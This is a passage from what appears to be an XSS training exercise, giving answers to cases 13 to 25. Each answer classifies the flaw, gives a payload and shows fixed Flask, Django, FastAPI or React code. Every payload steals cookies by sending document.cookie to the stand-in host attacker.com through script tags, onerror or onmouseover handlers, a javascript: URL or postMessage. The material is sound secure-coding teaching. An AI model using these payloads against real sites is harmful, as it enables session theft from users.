<span class="p">{</span> <span class="kd">const</span> <span class="nx">p</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nf">createElement</span><span class="p">(</span><span class="dl">'</span><span class="s1">p</span><span class="dl">'</span><span class="p">);</span> <span class="nx">p</span><span class="p">.</span><span class="nx">textContent</span> <span class="o">=</span> <span class="s2">`</span><span class="p">${</span><span class="nx">label</span><span class="p">}</span><span class="s2">: </span><span class="p">${</span><span class="nx">value</span><span class="p">}</span><span class="s2">`</span><span class="p">;</span> <span class="nx">container</span><span class="p">.</span><span class="nf">appendChild</span><span class="p">(</span><span class="nx">p</span><span class="p">);</span> <span class="p">}</span> <span class="kd">const</span> <span class="nx">params</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">URLSearchParams</span><span class="p">(</span><span class="nb">window</span><span class="p">.</span><span class="nx">location</span><span class="p">.</span><span class="nx">search</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">query</span> <span class="o">=</span> <span class="nx">params</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="dl">"</span><span class="s2">q</span><span class="dl">"</span><span class="p">)</span> <span class="o">||</span> <span class="dl">""</span><span class="p">;</span> <span class="nf">renderBanner</span><span class="p">(</span> <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">search-banner</span><span class="dl">"</span><span class="p">),</span> <span class="dl">"</span><span class="s2">You searched for</span><span class="dl">"</span><span class="p">,</span> <span class="nx">query</span> <span class="p">);</span> <span class="nt">&lt;/script&gt;</span> <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 13 — Answer </h3> <ol> <li><p>Stored XSS. Missing escaping. Remove the <code>autoescape off</code> block.</p></li> <li><p>Payload:<br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="nt">&lt;script&gt;</span><span class="nf">fetch</span><span class="p">(</span><span class="dl">'</span><span class="s1">https://attacker.com/?q=</span><span class="dl">'</span><span class="o">+</span><span class="nb">document</span><span class="p">.</span><span class="nx">cookie</span><span class="p">);</span><span class="nt">&lt;/script&gt;</span> </code></pre> </div> <ol> <li>Fix: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- announcements.html --&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;h2&gt;</span>Latest Announcements<span class="nt">&lt;/h2&gt;</span> <span class="nt">&lt;ul&gt;</span> {% for item in items %} <span class="nt">&lt;li&gt;</span>{{ item }}<span class="nt">&lt;/li&gt;</span> {% endfor %} <span class="nt">&lt;/ul&gt;</span> <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 14 — Answer </h3> <ol> <li><p>Reflected XSS vulnerability. Missing escaping. Note: <code>Markup()</code> tells Jinja2 its string argument does not need escaping. Thus <code>Markup()</code> should not be used.</p></li> <li><p>Payload for Reflected XSS:<br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>/?name=&lt;script&gt;fetch('https://attacker.com/?q='+document.cookie);&lt;/script&gt; </code></pre> </div> <ol> <li>Fix: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># app.py </span><span class="kn">from</span> <span class="n">flask</span> <span class="kn">import</span> <span class="n">Flask</span><span class="p">,</span> <span class="n">request</span><span class="p">,</span> <span class="n">render_template</span> <span class="n">app</span> <span class="o">=</span> <span class="nc">Flask</span><span class="p">(</span><span class="n">__name__</span><span class="p">)</span> <span class="nd">@app.route</span><span class="p">(</span><span class="sh">"</span><span class="s">/welcome</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">welcome</span><span class="p">():</span> <span class="n">username</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">args</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">name</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">guest</span><span class="sh">"</span><span class="p">)</span> <span class="k">return</span> <span class="nf">render_template</span><span class="p">(</span><span class="sh">"</span><span class="s">welcome.html</span><span class="sh">"</span><span class="p">,</span> <span class="n">username</span><span class="o">=</span><span class="n">username</span><span class="p">)</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- templates/welcome.html --&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;p&gt;</span>Welcome, {{ username }}!<span class="nt">&lt;/p&gt;</span> <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 15 — Answer </h3> <ol> <li><p>Reflected XSS. Missing Escaping. Template variables are placed in Javascript. Normal HTML escaping will not prevent XSS because code can be written without HTML characters.</p></li> <li><p>Payload:<br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>/?username=&lt;/script&gt;&lt;script&gt;fetch('https://attacker.com?q='+document.cookie);// </code></pre> </div> <ol> <li>Fix: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- templates/dashboard.html --&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;h1&gt;</span>Dashboard<span class="nt">&lt;/h1&gt;</span> <span class="nt">&lt;script&gt;</span> <span class="kd">var</span> <span class="nx">userData</span> <span class="o">=</span> <span class="p">{{</span> <span class="nx">user_data</span> <span class="o">|</span> <span class="nx">tojson</span> <span class="p">}};</span> <span class="nx">console</span><span class="p">.</span><span class="nf">log</span><span class="p">(</span><span class="dl">"</span><span class="s2">Logged in as:</span><span class="dl">"</span><span class="p">,</span> <span class="nx">userData</span><span class="p">.</span><span class="nx">name</span><span class="p">);</span> <span class="nt">&lt;/script&gt;</span> <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 16 — Answer </h3> <ol> <li><p>Reflected XSS. This is a gray area on which of the three the vulnerability belongs to. Wrong context escaping. Quotes must be wrapped around template variable to avoid XSS. This will ensure proper escaping of HTML attributes in this Case. HTML escaping will not mitigate XSS here.</p></li> <li><p>Payload:<br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>?theme=x onmouseover=fetch('https://attacker.com?q='+document.cookie) </code></pre> </div> <ol> <li>Fix: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- profile.html --&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;div</span> <span class="na">class=</span><span class="s">"{{ css_class }}"</span><span class="nt">&gt;</span> <span class="nt">&lt;p&gt;</span>Welcome to your profile.<span class="nt">&lt;/p&gt;</span> <span class="nt">&lt;/div&gt;</span> <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 17 — Answer </h3> <ol> <li><p>Misplaced Escaping. HTML escaping must be done in the frontend template at the frontend — not backend.</p></li> <li><p>Payload (will work once either the <code>escape()</code> in the backend or the <code>safe</code> filter in the frontend is removed):<br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight http"><code><span class="err">POST /comment Content-Type: application/x-www-form-urlencoded body=&lt;/li&gt;&lt;script&gt;fetch('https://attacker.com?q='+document.cookie);&lt;/script&gt;&lt;li&gt; </span></code></pre> </div> <ol> <li>Fix: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># app.py </span><span class="kn">from</span> <span class="n">flask</span> <span class="kn">import</span> <span class="n">Flask</span><span class="p">,</span> <span class="n">request</span><span class="p">,</span> <span class="n">render_template</span> <span class="n">app</span> <span class="o">=</span> <span class="nc">Flask</span><span class="p">(</span><span class="n">__name__</span><span class="p">)</span> <span class="n">comments</span> <span class="o">=</span> <span class="p">[]</span> <span class="nd">@app.route</span><span class="p">(</span><span class="sh">"</span><span class="s">/comment</span><span class="sh">"</span><span class="p">,</span> <span class="n">methods</span><span class="o">=</span><span class="p">[</span><span class="sh">"</span><span class="s">POST</span><span class="sh">"</span><span class="p">])</span> <span class="k">def</span> <span class="nf">add_comment</span><span class="p">():</span> <span class="n">body</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">form</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">body</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">)</span> <span class="n">comments</span><span class="p">.</span><span class="nf">append</span><span class="p">(</span><span class="n">body</span><span class="p">)</span> <span class="k">return</span> <span class="sh">"</span><span class="s">Comment saved.</span><span class="sh">"</span><span class="p">,</span> <span class="mi">200</span> <span class="nd">@app.route</span><span class="p">(</span><span class="sh">"</span><span class="s">/comments</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">view_comments</span><span class="p">():</span> <span class="k">return</span> <span class="nf">render_template</span><span class="p">(</span><span class="sh">"</span><span class="s">comments.html</span><span class="sh">"</span><span class="p">,</span> <span class="n">comments</span><span class="o">=</span><span class="n">comments</span><span class="p">)</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- templates/comments.html --&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;h2&gt;</span>Comments<span class="nt">&lt;/h2&gt;</span> <span class="nt">&lt;ul&gt;</span> {% for comment in comments %} <span class="nt">&lt;li&gt;</span>{{ comment }}<span class="nt">&lt;/li&gt;</span> {% endfor %} <span class="nt">&lt;/ul&gt;</span> <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 18 — Answer </h3> <ol> <li><p>DOM XSS. Missing escaping.</p></li> <li><p>Payload:<br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>#&lt;img src=x onerror="fetch('https://attacker.com/?q='+document.cookie);"&gt; </code></pre> </div> <ol> <li>Fix: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="cp">&lt;!DOCTYPE html&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;h1&gt;</span>Product Search<span class="nt">&lt;/h1&gt;</span> <span class="nt">&lt;div</span> <span class="na">id=</span><span class="s">"results"</span><span class="nt">&gt;&lt;/div&gt;</span> <span class="nt">&lt;script&gt;</span> <span class="kd">const</span> <span class="nx">query</span> <span class="o">=</span> <span class="nf">decodeURIComponent</span><span class="p">(</span><span class="nb">window</span><span class="p">.</span><span class="nx">location</span><span class="p">.</span><span class="nx">hash</span><span class="p">.</span><span class="nf">substring</span><span class="p">(</span><span class="mi">1</span><span class="p">));</span> <span class="kd">const</span> <span class="nx">container</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">'</span><span class="s1">results</span><span class="dl">'</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">strong</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nf">createElement</span><span class="p">(</span><span class="dl">'</span><span class="s1">strong</span><span class="dl">'</span><span class="p">);</span> <span class="nx">strong</span><span class="p">.</span><span class="nx">textContent</span> <span class="o">=</span> <span class="nx">query</span><span class="p">;</span> <span class="nx">container</span><span class="p">.</span><span class="nx">textContent</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">You searched for: </span><span class="dl">"</span><span class="p">;</span> <span class="nx">container</span><span class="p">.</span><span class="nf">appendChild</span><span class="p">(</span><span class="nx">strong</span><span class="p">);</span> <span class="nt">&lt;/script&gt;</span> <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 19 — Answer </h3> <ol> <li><p>DOM XSS. Missing escaping. Replace <code>innerHTML</code> with <code>textContent</code>.</p></li> <li><p>Payload:<br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight json"><code><span class="err">POST</span><span class="w"> </span><span class="err">/api/users/attacker/bio</span><span class="w"> </span><span class="err">Content-Type:</span><span class="w"> </span><span class="err">application/json</span><span class="w"> </span><span class="p">{</span><span class="nl">"bio"</span><span class="p">:</span><span class="w"> </span><span class="s2">"&lt;img src=x onerror=</span><span class="se">\"</span><span class="s2">fetch('https://attacker.com/?q='+document.cookie)</span><span class="se">\"</span><span class="s2">&gt;"</span><span class="p">}</span><span class="w"> </span></code></pre> </div> <ol> <li>Fix: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="c1">// components/Bio.jsx</span> <span class="nx">React</span><span class="p">.</span><span class="nf">useEffect</span><span class="p">(()</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="k">if </span><span class="p">(</span><span class="nx">bioRef</span><span class="p">.</span><span class="nx">current</span><span class="p">)</span> <span class="p">{</span> <span class="nx">bioRef</span><span class="p">.</span><span class="nx">current</span><span class="p">.</span><span class="nx">textContent</span> <span class="o">=</span> <span class="nx">bio</span><span class="p">;</span> <span class="p">}</span> <span class="p">},</span> <span class="p">[</span><span class="nx">bio</span><span class="p">]);</span> </code></pre> </div> <h3> Case 20 — Answer </h3> <ol> <li><p>Reflected XSS. This is a gray area for classification of cause of error. In this case the developer must validate URL before passing it as argument. Wrong context escaping.</p></li> <li><p>Payload:<br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>/?dest=javascript:fetch('https://attacker.com/?q='+document.cookie); </code></pre> </div> <ol> <li>Fix: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># app.py </span><span class="kn">from</span> <span class="n">flask</span> <span class="kn">import</span> <span class="n">Flask</span><span class="p">,</span> <span class="n">redirect</span><span class="p">,</span> <span class="n">request</span><span class="p">,</span> <span class="n">render_template</span> <span class="kn">from</span> <span class="n">urllib.parse</span> <span class="kn">import</span> <span class="n">urlparse</span><span class="p">,</span> <span class="n">urljoin</span> <span class="n">app</span> <span class="o">=</span> <span class="nc">Flask</span><span class="p">(</span><span class="n">__name__</span><span class="p">)</span> <span class="k">def</span> <span class="nf">is_safe_url</span><span class="p">(</span><span class="n">target</span><span class="p">):</span> <span class="n">ref_url</span> <span class="o">=</span> <span class="nf">urlparse</span><span class="p">(</span><span class="n">request</span><span class="p">.</span><span class="n">host_url</span><span class="p">)</span> <span class="n">test_url</span> <span class="o">=</span> <span class="nf">urlparse</span><span class="p">(</span><span class="nf">urljoin</span><span class="p">(</span><span class="n">request</span><span class="p">.</span><span class="n">host_url</span><span class="p">,</span> <span class="n">target</span><span class="p">))</span> <span class="k">return</span> <span class="n">test_url</span><span class="p">.</span><span class="n">scheme</span> <span class="ow">in</span> <span class="p">(</span><span class="sh">'</span><span class="s">http</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">https</span><span class="sh">'</span><span class="p">)</span> <span class="ow">and</span> \ <span class="n">ref_url</span><span class="p">.</span><span class="n">netloc</span> <span class="o">==</span> <span class="n">test_url</span><span class="p">.</span><span class="n">netloc</span> <span class="nd">@app.route</span><span class="p">(</span><span class="sh">"</span><span class="s">/redirect</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">redirect_user</span><span class="p">():</span> <span class="n">destination</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">args</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">dest</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">/home</span><span class="sh">"</span><span class="p">)</span> <span class="k">if</span> <span class="nf">is_safe_url</span><span class="p">(</span><span class="n">destination</span><span class="p">):</span> <span class="k">return</span> <span class="nf">redirect</span><span class="p">(</span><span class="n">destination</span><span class="p">)</span> <span class="k">else</span><span class="p">:</span> <span class="k">return</span> <span class="nf">redirect</span><span class="p">(</span><span class="sh">"</span><span class="s">/home</span><span class="sh">"</span><span class="p">)</span> </code></pre> </div> <h3> Case 21 — Answer </h3> <ol> <li><p>DOM XSS. Missing escaping. <code>innerHTML</code> must be replaced with <code>textContent</code>.</p></li> <li><p>Payload for variable <code>event</code>:<br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="nb">window</span><span class="p">.</span><span class="nx">opener</span><span class="p">.</span><span class="nf">postMessage</span><span class="p">(</span> <span class="dl">"</span><span class="s2">&lt;img src=x onerror=</span><span class="se">\"</span><span class="s2">fetch('https://attacker.com/?q='+document.cookie)</span><span class="se">\"</span><span class="s2">&gt;</span><span class="dl">"</span><span class="p">,</span> <span class="dl">"</span><span class="s2">*</span><span class="dl">"</span> <span class="p">);</span> </code></pre> </div> <ol> <li>Fix: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="cp">&lt;!DOCTYPE html&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;h1&gt;</span>Notifications<span class="nt">&lt;/h1&gt;</span> <span class="nt">&lt;div</span> <span class="na">id=</span><span class="s">"notification-bar"</span><span class="nt">&gt;&lt;/div&gt;</span> <span class="nt">&lt;script&gt;</span> <span class="nb">window</span><span class="p">.</span><span class="nf">addEventListener</span><span class="p">(</span><span class="dl">"</span><span class="s2">message</span><span class="dl">"</span><span class="p">,</span> <span class="kd">function</span><span class="p">(</span><span class="nx">event</span><span class="p">)</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">msg</span> <span class="o">=</span> <span class="nx">event</span><span class="p">.</span><span class="nx">data</span><span class="p">;</span> <span class="kd">const</span> <span class="nx">notbar</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">'</span><span class="s1">notification-bar</span><span class="dl">'</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">p</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nf">createElement</span><span class="p">(</span><span class="dl">'</span><span class="s1">p</span><span class="dl">'</span><span class="p">);</span> <span class="nx">p</span><span class="p">.</span><span class="nx">textContent</span> <span class="o">=</span> <span class="s2">`New message: </span><span class="p">${</span><span class="nx">msg</span><span class="p">}</span><span class="s2">`</span><span class="p">;</span> <span class="nx">notbar</span><span class="p">.</span><span class="nf">appendChild</span><span class="p">(</span><span class="nx">p</span><span class="p">);</span> <span class="p">});</span> <span class="nt">&lt;/script&gt;</span> <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 22 — Answer </h3> <ol> <li><p>Reflected XSS. Missing escaping. Remove the <code>safe</code> filter: it tells Jinja2 that there is no need for HTML Escaping — leaving the frontend vulnerable to XSS. Argument for <code>username</code> should be a parameter for the format string in <code>format_html()</code>. This will ensure proper escaping.</p></li> <li><p>Payload for <code>user</code>:<br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>/?user=&lt;script&gt;fetch('https://attacker.com?q='+document.cookie);&lt;/script&gt; </code></pre> </div> <ol> <li>Fix: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># views.py </span><span class="kn">from</span> <span class="n">django.shortcuts</span> <span class="kn">import</span> <span class="n">render</span> <span class="kn">from</span> <span class="n">django.utils.html</span> <span class="kn">import</span> <span class="n">format_html</span> <span class="k">def</span> <span class="nf">user_badge</span><span class="p">(</span><span class="n">request</span><span class="p">):</span> <span class="n">username</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">GET</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">user</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">guest</span><span class="sh">"</span><span class="p">)</span> <span class="n">role</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">GET</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">role</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">viewer</span><span class="sh">"</span><span class="p">)</span> <span class="n">badge</span> <span class="o">=</span> <span class="nf">format_html</span><span class="p">(</span> <span class="sh">"</span><span class="s">&lt;span class=</span><span class="sh">'</span><span class="s">badge</span><span class="sh">'</span><span class="s">&gt;{}&lt;/span&gt; logged in as {}</span><span class="sh">"</span><span class="p">,</span> <span class="n">role</span><span class="p">,</span> <span class="n">username</span> <span class="p">)</span> <span class="k">return</span> <span class="nf">render</span><span class="p">(</span><span class="n">request</span><span class="p">,</span> <span class="sh">"</span><span class="s">badge.html</span><span class="sh">"</span><span class="p">,</span> <span class="p">{</span><span class="sh">"</span><span class="s">badge</span><span class="sh">"</span><span class="p">:</span> <span class="n">badge</span><span class="p">})</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- badge.html --&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;div</span> <span class="na">id=</span><span class="s">"header"</span><span class="nt">&gt;</span> {{ badge }} <span class="nt">&lt;/div&gt;</span> <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 23 — Answer </h3> <ol> <li><p>Stored XSS since the payload is stored in-memory on server and later sent to frontend in <code>/reviews</code> handler. Misplaced escaping.</p></li> <li><p>Payload:<br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight json"><code><span class="err">POST</span><span class="w"> </span><span class="err">/review</span><span class="w"> </span><span class="err">Content-Type:</span><span class="w"> </span><span class="err">application/json</span><span class="w"> </span><span class="p">{</span><span class="nl">"text"</span><span class="p">:</span><span class="w"> </span><span class="s2">"&lt;/li&gt;&lt;script&gt;fetch('https://attacker.com/?q='+document.cookie);&lt;/script&gt;&lt;li&gt;"</span><span class="p">}</span><span class="w"> </span></code></pre> </div> <ol> <li>Fix: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># main.py </span><span class="kn">from</span> <span class="n">fastapi</span> <span class="kn">import</span> <span class="n">FastAPI</span><span class="p">,</span> <span class="n">Request</span> <span class="kn">from</span> <span class="n">fastapi.templating</span> <span class="kn">import</span> <span class="n">Jinja2Templates</span> <span class="n">app</span> <span class="o">=</span> <span class="nc">FastAPI</span><span class="p">()</span> <span class="n">templates</span> <span class="o">=</span> <span class="nc">Jinja2Templates</span><span class="p">(</span><span class="n">directory</span><span class="o">=</span><span class="sh">"</span><span class="s">templates</span><span class="sh">"</span><span class="p">)</span> <span class="n">reviews</span> <span class="o">=</span> <span class="p">[]</span> <span class="nd">@app.post</span><span class="p">(</span><span class="sh">"</span><span class="s">/review</span><span class="sh">"</span><span class="p">)</span> <span class="k">async</span> <span class="k">def</span> <span class="nf">add_review</span><span class="p">(</span><span class="n">request</span><span class="p">:</span> <span class="n">Request</span><span class="p">):</span> <span class="n">body</span> <span class="o">=</span> <span class="k">await</span> <span class="n">request</span><span class="p">.</span><span class="nf">json</span><span class="p">()</span> <span class="n">reviews</span><span class="p">.</span><span class="nf">append</span><span class="p">(</span><span class="n">body</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">text</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">))</span> <span class="k">return</span> <span class="p">{</span><span class="sh">"</span><span class="s">status</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">saved</span><span class="sh">"</span><span class="p">}</span> <span class="nd">@app.get</span><span class="p">(</span><span class="sh">"</span><span class="s">/reviews</span><span class="sh">"</span><span class="p">)</span> <span class="k">async</span> <span class="k">def</span> <span class="nf">view_reviews</span><span class="p">(</span><span class="n">request</span><span class="p">:</span> <span class="n">Request</span><span class="p">):</span> <span class="k">return</span> <span class="n">templates</span><span class="p">.</span><span class="nc">TemplateResponse</span><span class="p">(</span> <span class="sh">"</span><span class="s">reviews.html</span><span class="sh">"</span><span class="p">,</span> <span class="p">{</span><span class="sh">"</span><span class="s">request</span><span class="sh">"</span><span class="p">:</span> <span class="n">request</span><span class="p">,</span> <span class="sh">"</span><span class="s">reviews</span><span class="sh">"</span><span class="p">:</span> <span class="n">reviews</span><span class="p">}</span> <span class="p">)</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- templates/reviews.html --&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;h2&gt;</span>Customer Reviews<span class="nt">&lt;/h2&gt;</span> <span class="nt">&lt;ul&gt;</span> {% for review in reviews %} <span class="nt">&lt;li&gt;</span>{{ review }}<span class="nt">&lt;/li&gt;</span> {% endfor %} <span class="nt">&lt;/ul&gt;</span> <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 24 — Answer </h3> <ol> <li><p>Reflected XSS. Missing Escaping. <code>mark_safe()</code> tells Django to not escape its arguments.</p></li> <li><p>Payload:<br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>/?q="&gt;&lt;img src=x onerror="fetch('https://attacker.com?q='+document.cookie)" </code></pre> </div> <ol> <li>Fix: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># views.py </span><span class="kn">from</span> <span class="n">django.shortcuts</span> <span class="kn">import</span> <span class="n">render</span> <span class="k">def</span> <span class="nf">search</span><span class="p">(</span><span class="n">request</span><span class="p">):</span> <span class="n">query</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">GET</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">q</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">)</span> <span class="k">return</span> <span class="nf">render</span><span class="p">(</span><span class="n">request</span><span class="p">,</span> <span class="sh">"</span><span class="s">search.html</span><span class="sh">"</span><span class="p">,</span> <span class="p">{</span><span class="sh">"</span><span class="s">query</span><span class="sh">"</span><span class="p">:</span> <span class="n">query</span><span class="p">})</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- search.html --&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;h1&gt;</span>Search<span class="nt">&lt;/h1&gt;</span> <span class="nt">&lt;form</span> <span class="na">method=</span><span class="s">"GET"</span> <span class="na">action=</span><span class="s">"/search"</span><span class="nt">&gt;</span> <span class="nt">&lt;input</span> <span class="na">type=</span><span class="s">"text"</span> <span class="na">name=</span><span class="s">"q"</span> <span class="na">value=</span><span class="s">"{{ query }}"</span><span class="nt">&gt;</span> <span class="nt">&lt;button</span> <span class="na">type=</span><span class="s">"submit"</span><span class="nt">&gt;</span>Search<span class="nt">&lt;/button&gt;</span> <span class="nt">&lt;/form&gt;</span> <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 25 — Answer </h3> <ol> <li><p>DOM XSS. Missing escaping. <code>innerHTML</code> must be replaced with <code>textContent</code>.</p></li> <li><p>Payload:<br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>/?page=&lt;/h2&gt;&lt;img src=x onerror="fetch('https://attacker.com/?q='+document.cookie)"&gt;&lt;h2&gt; </code></pre> </div> <ol> <li>Fix: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="cp">&lt;!DOCTYPE html&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;head&gt;</span> <span class="nt">&lt;title&gt;</span>Loading...<span class="nt">&lt;/title&gt;</span> <span class="nt">&lt;/head&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;h1&gt;</span>Welcome<span class="nt">&lt;/h1&gt;</span> <span class="nt">&lt;div</span> <span class="na">id=</span><span class="s">"content"</span><span class="nt">&gt;</span>Loading your page...<span class="nt">&lt;/div&gt;</span> <span class="nt">&lt;script&gt;</span> <span class="kd">const</span> <span class="nx">params</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">URLSearchParams</span><span class="p">(</span><span class="nb">window</span><span class="p">.</span><span class="nx">location</span><span class="p">.</span><span class="nx">search</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">page</span> <span class="o">=</span> <span class="nx">params</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="dl">"</span><span class="s2">page</span><span class="dl">"</span><span class="p">)</span> <span class="o">||</span> <span class="dl">"</span><span class="s2">Home</span><span class="dl">"</span><span class="p">;</span> <span class="nb">document</span><span class="p">.</span><span class="nx">title</span> <span class="o">=</span> <span class="nx">page</span><span class="p">;</span> <span class="kd">const</span> <span class="nx">content</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">'</span><span class="s1">content</span><span class="dl">'</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">h2</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nf">createElement</span><span class="p">(</span><span class="dl">'</span><span class="s1">h2</span><span class="dl">'</span><span class="p">);</span> <span class="nx">h2</span><span class="p">.</span><span class="nx">textContent</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">You are viewing: </span><span class="dl">"</span> <span class="o">+</span> <span class="nx">page</span><span class="p">;</span> <span class="nx">content</span><span class="p">.</span><span class="nf">appendChild</span><span class="p">(</span><span class="nx">h2</span><span class="p">);</span> <span 